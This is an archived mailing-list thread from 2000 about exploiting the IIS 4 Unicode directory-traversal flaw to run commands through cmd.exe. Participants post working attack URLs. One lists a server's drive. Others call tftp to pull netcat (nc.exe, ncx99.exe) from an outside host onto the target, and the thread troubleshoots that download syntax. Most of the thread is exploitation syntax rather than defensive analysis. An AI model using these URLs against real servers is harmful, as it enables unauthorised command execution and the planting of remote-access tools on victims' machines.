OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: dos commands via iis 4 (TFTP)
From: booboo (booboo65535.COM)
Date: Tue Nov 14 2000 - 08:30:36 CST

you can also normally swap the - with a / as in netstat+"-a" or netstat+/a

BooBoo

On Fri, 10 Nov 2000, Loschiavo, Dave wrote:

> Thanks, looks like I inadvertantly left the "get" out of the message. I was
> including that in the URL when testing. However, what I did notice was the
> use of the quotes in the "-i" area of the URL. I was not using quotes. Will
> have to give that a shot.
>
> -thanks
>
> -----Original Message-----
> From: Robert A. Seace
> To: DLoschiavofrcc.cc.ca.us
> Cc: VULN-DEVSECURITYFOCUS.COM
> Sent: 11/10/00 10:11 AM
> Subject: Re: dos commands via iis 4 (TFTP)
>
> In the profound words of Loschiavo, Dave:
> >
> > I tried tftp commands in the URL, formatted like this:
> >
> http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/tftp+-i+192.168.1.20+nc.exe"
> >
> > and got nowhere, while this:
> >
> http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
> 32/c
> > md.exe?/c+dir+c: gave me a listing of the of the c: drive.
> >
> > Am I formatting the "TFTP" URL incorrectly?
>
> Yeah, I think so... But, I'm no TFTP guru, either...
> Personally, I would just use RCP...
>
> However, looking at the original advisory on BugTraq, that
> mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"),
> I think you need a "GET" before the "nc.exe", and maybe a destination
> location specified after it, for where to place it on the NT box...
> For instance, it shows an URL of:
>
> /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n
> cx99.exe+c:\winnt\system32\ncx99.exe
>